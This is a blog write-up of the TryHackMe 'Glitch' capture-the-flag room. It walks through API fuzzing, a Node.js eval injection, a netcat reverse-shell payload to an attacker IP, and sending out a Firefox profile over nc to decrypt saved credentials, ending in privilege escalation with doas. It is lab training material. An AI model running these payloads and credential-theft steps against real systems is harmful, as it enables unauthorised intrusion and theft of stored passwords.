TryHackMe — Glitch

Having fun with TryHackMe again. So, here is the write up and guideline to pass this Glitch challenge.

Room: https://tryhackme.com/room/glitch
Level: Easy

Task: Challenge showcasing a web app and simple privilege escalation. Can you find the glitch?

Lets get started

As usual, start the machine and open the IP in browser (took like 10 minutes to appear. I don’t know why)

Just a blank page with glitch wallpaper. When open the console, there is an api endpoint. Let’s open it in browser

Oh!, there is a token. But, that’s not the answer. Looks like base64. Using cyberchef,

First flag done!. Move on… Continue to investigate…

From the request, there is Cookie default as token=value. Lets change it

document.cookie="token=**************"

and refresh the page. Seems like not changing.. Try POST

# curl -X POST http://10.10.82.X/api/access --cookie "token=**************"<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<pre>Cannot POST /api/access</pre>
</body>
</html>

Never mind. Just run feroxbuster from /api

# feroxbuster — url http://10.10.82.X/api -w ~/dirb/big.txt -t 20 🎯 Target Url      │ http://10.10.82.X/api
🚀 Threads │ 20
📖 Wordlist │ ~/dirb/big.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.2.3
💉 Config File │ /usr/local/bin/ferox-config.toml
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
200 1l 1w 36c http://10.10.82.X/api/access
200 1l 1w 169c http://10.10.82.X/api/items
[####################] — 3m 20468/20468 0s found:2 errors:0
[####################] — 3m 20468/20468 101/s http://10.10.82.X/api

Found another hidden endpoint. /api/items

# curl -X GET http://10.10.82.X/api/items{"sins":["lust","gluttony","greed","sloth","wrath","envy","pride"],"errors":["error","error","error","error","error","error","error","error","error"],"deaths":["death"]}

Hmm.. don’t know what that means. By this point, cookie is not mandatory anymore. Maybe there is a glitch in the system. Hehe.. Btw, continue try using POST,

# curl -X POST http://10.10.82.X/api/items
{"message":"there_is_a_glitch_in_the_matrix"}

There is a message. There must be some hidden from here. Hidden parameter maybe? Faster way to check by using Arjun,

# arjun -u http://10.10.7.149/api/items -m POST -w ~/wordlists/wfuzz/general/common.txt
Probing the target for stability
Analysing HTTP response for anamolies
Analysing HTTP response for potential parameter names
Logicforcing the URL endpoint

No result, hmmm. Need to use WFuzz i think. Running wfuzz using same dict…

# wfuzz -z file,wordlists/wfuzz/general/common.txt -c -d "testing" --hc 400,401,403,404 http://10.10.X.X/api/items\?FUZZ\=testing
Target: http://10.10.X.X/api/items?FUZZ=testing
Total requests: 950
====================================================================
ID Response Lines Word Chars Payload
====================================================================
000000201: 500 10 L 64 W 1084 Ch "cmd"

“CMD” okay.. there is parameter called cmd which give changes the page response. Let’s see

# curl -X POST http://10.10.X.X/api/items?cmd=test
....
....
<pre>ReferenceError: test is not defined<br> &nbsp; &nbsp;at eval (eval at router.post (/var/web/routes/api.js:25:60)
....

Okay…, let’s test if can be reverse shell. Referring to this github,

require('child_process').exec('nc -e /bin/sh YOUR_IP 1234')

Run nc -nvlp 1234 first. Then try using this,

# curl -X POST -G http://10.10.X.X/api/items --data-urlencode "cmd=require('child_process').exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc YOUR_IP 1234 >/tmp/f')"vulnerability_exploited [object Object]

The message detect vulnerability and luckily reverse shell is working

Connection from 10.10.X.X:55038
/bin/sh: 0: can’t access tty; job control turned off
$

First thing first, upgrade the terminal first,

# python -c 'import pty; pty.spawn("/bin/bash")'

Now, hunt the user.txt file

# ls -al ~/
drwxr-xr-x 8 user user 4096 Jan 27 10:33 .
drwxr-xr-x 4 root root 4096 Jan 15 14:13 ..
-rw-rw-r-- 1 user user 22 Jan 4 15:29 user.txt
# cat ~/user.txt
THM{XXXXXXXXXXXXXXXXX}

Ok now, Root!

From the same directory

# ls -al
lrwxrwxrwx 1 root root 9 Jan 21 09:05 .bash_history -> /dev/null
-rw-r--r-- 1 user user 3771 Apr 4 2018 .bashrc
drwx------ 2 user user 4096 Jan 4 13:41 .cache
drwxrwxrwx 4 user user 4096 Jan 27 10:32 .firefox
drwx------ 3 user user 4096 Jan 4 13:41 .gnupg
drwxr-xr-x 270 user user 12288 Jan 4 14:07 .npm
drwxrwxr-x 5 user user 4096 Apr 6 06:08 .pm2
drwx------ 2 user user 4096 Jan 21 08:47 .ssh
-rw-rw-r-- 1 user user 22 Jan 4 15:29 user.txt

There is full permission for folder .firefox.

# ls -al .firefox
drwxrwxrwx 11 user user 4096 Jan 27 10:32 b5w4643p.default-release
drwxrwxrwx 3 user user 4096 Jan 27 10:32 'Crash Reports'
-rwxrwxr-x 1 user user 259 Jan 27 10:32 profiles.ini

Its actually a firefox storage which contains sensitive information here. Drill down, found b5w4643p.default-release/login.json

{"nextId":2,"logins":[{"id":1,"hostname":"https://glitch.thm","httpRealm":null,"formSubmitURL":"","usernameField":"","passwordField":"","encryptedUsername":"MDIEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECCP5HBZJq0+DBAjWdWrk7qo4eA==","encryptedPassword":"MDoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECPfxo08d5UxEBBB9aJ+chJC2pDccxKhqs1UH","guid":"{9c80e9f2-0377-496e-9404-4411eb94783b}","encType":1,"timeCreated":1610645982812,"timeLastUsed":1610645982812,"timePasswordChanged":1610645982812,"timesUsed":1}],"potentiallyVulnerablePasswords":[],"dismissedBreachAlertsByLoginGUID":{},"version":3}

Everything is encrypted. Search for the Decrypter, and found this repo. Buttt, unable to git clone inside this victim machine. Sooo, we can use netcat to download this firefox folder. Zip first

# tar -czvf firefox.tar.gz .firefox

Ok now from victim machine, run this netcat command

# nc YOUR_IP 4444 -w 3 < ~/firefox.tar.g

And from local, listen

# nc -lvp 4444 > ~/Downloads/firefox.tar.gz
Connection from 10.10.X.X:60726

Ok its successfully downloaded. Extract it and run the firefox decrypter.

# python3 firefox_decrypt.py ~/Downloads/.firefox             
Select the Mozilla profile you wish to decrypt
1 -> hknqkrn7.default
2 -> b5w4643p.default-release
2
Website: https://glitch.thm
Username: 'v0id'
Password: 'XXXXXXXXXXXX'

Oh! That’s fast. Let’s use as SSH to login as v0id user

# ssh v0id@10.10.7.149
ssh: connect to host 10.10.7.149 port 22: Operation timed out

Okay, ssh not possible, then try su from inside the victim machine

# su v0id
password: XXXXXXXXXXX
v0id@ubuntu:~$

Success! Its working…

# ls /root
ls: cannot open directory '/root': Permission denied
# sudo -l
password:
Sorry, user v0id may not run sudo on ubuntu.

Let’s see the hint and it says “ sudo is bloat.” Try to google search and first entry said “Sudo Is Bloat. Use Doas Instead!”. Then, I type the doas command

v0id@ubuntu:/home/user$ doasusage: doas [-nSs] [-a style] [-C config] [-u user] command [args]

Its accept command argument. Let’s try if it can access root folder

# doas ls /root
password: XXXXXXXXXXXXX
clean.sh root.txt

Haha! Simply can cat command the file then

# doas cat /root/root.txt
password: XXXXXXXXXXXXXX
THM{XXXXXXXXXXXXXXXXXXXX}

Done!!!

~~~Happy Hacking~~~

Software Engineer at Teratotech.com

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store